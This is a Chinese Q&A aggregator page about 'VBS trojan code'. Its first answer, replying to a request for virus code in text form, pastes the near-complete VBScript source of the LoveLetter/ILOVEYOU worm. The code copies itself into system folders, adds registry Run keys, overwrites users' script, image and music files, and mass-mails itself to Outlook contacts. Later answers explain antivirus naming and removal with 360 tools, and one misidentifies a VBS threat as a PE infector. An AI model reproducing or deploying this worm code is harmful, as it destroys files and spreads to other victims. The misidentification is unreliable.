×

vbs木马代码

vbs木马代码(谁有木马或病毒代码 用那种文本文档的)

admin admin 发表于2023-12-30 17:37:00 浏览32 评论0

抢沙发发表评论

各位老铁们好,相信很多人对vbs木马代码都不是特别的了解,因此呢,今天就来为大家分享下关于vbs木马代码以及谁有木马或病毒代码 用那种文本文档的的问题知识,还望可以帮助大家,解决大家的一些困惑,下面一起来看看吧!

本文目录

谁有木马或病毒代码 用那种文本文档的

你可以看看这个::)rem barok -loveletter(vbe) 《i hate go to school》 rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group/ Manila,Philippines On Error Resume Next dimfso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WindowsScripting Host\\Settings\\Timeout") if (rr》=1) then 《-设置超时wscr.RegWrite"HKEY_CURRENT_USER\\Software\\Microsoft\\WindowsScripting Host\\Settings\\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\\MSKernel32.vbs") 《-复制文件c.Copy(dirwin&"\\Win32DLL.vbs") 《-复制文件c.Copy(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",dirsystem&"\\MSKernel32.vbs"regcreate"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL",dirwin&"\\Win32DLL.vbs"downread="" downread=regget("HKEY_CURRENT_USER\\Software\\Microsoft\\InternetExplorer\\Download Directory") if (downread="") then downread="c:\\" end if if (fileexist(dirsystem&"\\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage"," "elseif num = 2 then regcreate "HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage"," "elseif num = 3 then regcreate "HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage"," "elseif num = 4 then regcreate "HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage"," "end if end if if (fileexist(downread&"\\WIN-BUGSFIX.exe")=0) then regcreate"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WIN-BUGSFIX",downread&"\\WIN-BUGSFIX.exe"regcreate"HKEY_CURRENT_USER\\Software\\Microsoft\\InternetExplorer\\Main\\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or(ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq《》folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or(s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")then setscriptini=fso.CreateTextFile(folderspec&"\\script.ini")scriptini.WriteLine "" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script...mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affectand will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine "; " scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt}" scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dimx,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a)if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)》int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead)if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attachedLOVELETTER coming from me." male.Attachments.Add(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")male.Send regedit.RegWrite"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead,1,"REG_DWORD"end if x=x+1 next regedit.RegWrite"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Countelse regedit.RegWrite"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Countend if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="《HTML》《HEAD》《TITLE》LOVELETTER -HTML《?-?TITLE》《META NAME=@- @ Generator@- @CONTENT=@- @BAROK VBS - LOVELETTER@- @》"&vbcrlf& _ "《META NAME=@- @ Author@- @ CONTENT=@- @spyder ?-?ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila,Philippines ?-? March 2000@- @》"&vbcrlf& _ "《META NAME=@- @ Description@- @ CONTENT=@- @simple but ithink this is good...@- @》"&vbcrlf& _ "《?-?HEAD》《BODYonmouseOUT=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@"&vbcrlf& _ " ONKEYDOWN=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@BGPROPERTIES=@- @ fixed@- @BGCOLOR=@- @ #FF9933@- @》"&vbcrlf& _ "《CENTER》《p》This HTML file need ActiveXControl《?-?p》《p》To Enable to read this HTML file《BR》-Please press #-#YES#-# button to EnableActiveX《?-?p》"&vbcrlf& _ "《?-?CENTER》《MARQUEE LOOP=@- @ infinite@- @BGCOLOR=@- @ yellow@- @》----------z--------------------z----------《?-?MARQUEE》"&vbcrlf& _ "《?-?BODY》《?-?HTML》"&vbcrlf& _ "《SCRIPT language=@- @ JScript@- @》"&vbcrlf& _ "《!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;varhi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf&_ "?-??-?--》"&vbcrlf& _ "《?-?SCRIPT》"&vbcrlf& _ "《SCRIPT LANGUAGE=@- @ VBScript@- @》"&vbcrlf& _ "《!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dimfso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf&_ "aw=1"&vbcrlf& _ "code=" dta2="setfso=CreateObject(@-@ Scripting.FileSystemObject@- @)"&vbcrlf&_ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf&_ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf&_ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf&_ "setwri=fso.CreateTextFile(dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @)"&vbcrlf&_ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if(fso.FileExists(dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @))then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initializeActiveX@- @"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit =CreateObject(@-@ WScript.Shell@- @)"&vbcrlf& _ "regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Soft ware^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@- @,dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @"&vbcrlf&_ "?-??-?--》"&vbcrlf& _ "《?-?SCRIPT》" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"\’") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"\’") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"\’",chr(91)+chr(45)+chr(91))lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))lines(n)=replace(lines(n),"\\",chr(37)+chr(45)+chr(37))if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next setb=fso.CreateTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM")b.close setd=fso.OpenTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM",2)d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

今天我的360安全卫士查出一个木马:virus.vbs.worm.a!这到底是什么木马,它想干什么请各路大侠赐教

病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的。不同的种类的病毒,其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ,蠕虫病毒的前缀是 Worm 等等还有其他的。病毒名是指一个病毒的家族特征,是用来区别和标识病毒家族的,如以前着名的CIH病毒的家族名都是统一的“ CIH ”,振荡波蠕虫病毒的家族名是“ Sasser ”。病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示,如 Worm.Sasser.b 就是指 振荡波蠕虫病毒的变种B,因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多,可以采用数字与字母混合表示变种标识。蠕虫病毒的前缀是:Worm。这种病毒的共有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。直接按提示清理掉即可

这是什么木马VBS.hideicon.g

VBS. 这是最近很流行的一个病毒!非常猖狂! 病毒名称 Win32 WINDOWS下的PE病毒 别 名 病毒长度 危害程度 传播途径 行为类型 WINDOWS下的PE病毒 感 染 该病毒是一个WIN32 PE感染型病毒,病毒感染普通PE EXE文件并把自己的代码加到EXE文件尾部.修改原程序的入口点以指向病毒体,病毒本身没有什么危害.但被感染的文件可能被破坏不能正常运行 具体怎么清楚建议你去甲壳虫论坛提问 看有人有专杀工具没??或者更好的建议

trojan.vbs.agent.bw是什么木马360杀到的

trojan.vbs.agent.bw是恶意脚本,用360安全卫士,在安全模式一下用全盘查杀一下木马,然后清理一下恶意插件,最后清理系统垃圾和注册表,这样这个病毒就清理干净了,如果实在不行你可以使用360系统急救箱来处理,祝你好运兄弟

以上就是我们为大家找到的有关“vbs木马代码(谁有木马或病毒代码 用那种文本文档的)”的所有内容了,希望可以帮助到你。如果对我们网站的其他内容感兴趣请持续关注本站。